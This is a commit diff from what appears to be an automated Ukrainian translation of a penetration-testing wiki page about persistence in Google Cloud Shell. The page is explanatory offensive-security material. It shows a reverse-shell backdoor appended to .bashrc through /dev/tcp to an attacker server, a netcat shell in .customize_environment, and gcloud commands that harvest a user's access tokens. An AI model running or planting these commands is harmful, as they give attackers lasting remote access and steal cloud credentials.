Translated ['.github/pull_request_template.md', 'src/README.md', 'src/pe

This commit is contained in:
Translator
2025-01-02 00:06:10 +00:00
parent 92eaf7ce11
commit 210c27fffb
217 changed files with 1796 additions and 1807 deletions

View File

@@ -19,32 +19,32 @@
Ця консоль має деякі цікаві можливості для атакуючих:
1. **Будь-який користувач Google з доступом до Google Cloud** має доступ до повністю автентифікованого екземпляра Cloud Shell (Службові облікові записи можуть, навіть будучи власниками організації).
2. Вказаний екземпляр **зберігатиме свій домашній каталог принаймні 120 днів**, якщо не буде жодної активності.
2. Цей екземпляр **зберігатиме свою домашню директорію принаймні 120 днів**, якщо не буде жодної активності.
3. **Немає можливостей для організації моніторити** активність цього екземпляра.
Це в основному означає, що атакуючий може помістити бекдор у домашній каталог користувача, і поки користувач підключається до GC Shell принаймні кожні 120 днів, бекдор виживе, і атакуючий отримає оболонку щоразу, коли вона запускається, просто виконавши:
Це в основному означає, що атакуючий може помістити бекдор у домашню директорію користувача, і поки користувач підключається до GC Shell принаймні кожні 120 днів, бекдор виживе, і атакуючий отримає оболонку щоразу, коли вона запускається, просто виконавши:
```bash
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
```
Є ще один файл у домашній папці під назвою **`.customize_environment`**, який, якщо існує, буде **виконуватись щоразу**, коли користувач отримує доступ до **cloud shell** (як у попередній техніці). Просто вставте попередній бекдор або один подібний, щоб підтримувати стійкість, поки користувач "часто" використовує cloud shell:
В домашній папці є ще один файл під назвою **`.customize_environment`**, який, якщо існує, буде **виконуватись щоразу**, коли користувач отримує доступ до **cloud shell** (як у попередній техніці). Просто вставте попередній бекдор або один з наступних, щоб підтримувати стійкість, поки користувач "часто" використовує cloud shell:
```bash
#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash
```
> [!WARNING]
> Важливо зазначити, що **перший раз, коли виконується дія, що вимагає аутентифікації**, у браузері користувача з'являється вікно авторизації. Це вікно потрібно прийняти, перш ніж команда зможе виконатися. Якщо з'явиться несподіване спливаюче вікно, це може викликати підозру і потенційно скомпрометувати метод збереження.
> Важливо зазначити, що **перший раз, коли виконується дія, що вимагає аутентифікації**, у браузері користувача з'являється вікно авторизації. Це вікно потрібно прийняти, перш ніж команда зможе виконатися. Якщо з'явиться несподіване вікно, це може викликати підозру і потенційно скомпрометувати метод збереження.
Це спливаюче вікно від виконання `gcloud projects list` з cloud shell (як атакуючий), яке видно в сеансі браузера користувача:
Це вікно з'являється при виконанні `gcloud projects list` з cloud shell (як атакуючий), яке видно в сеансі браузера користувача:
<figure><img src="../../../images/image (10).png" alt=""><figcaption></figcaption></figure>
Однак, якщо користувач активно використовував cloudshell, спливаюче вікно не з'явиться, і ви можете **збирати токени користувача за допомогою**:
Однак, якщо користувач активно використовував cloudshell, вікно не з'явиться, і ви можете **збирати токени користувача за допомогою**:
```bash
gcloud auth print-access-token
gcloud auth application-default print-access-token
```
#### Як встановлюється SSH-з'єднання
#### Як встановлюється з'єднання SSH
В основному, використовуються ці 3 API виклики: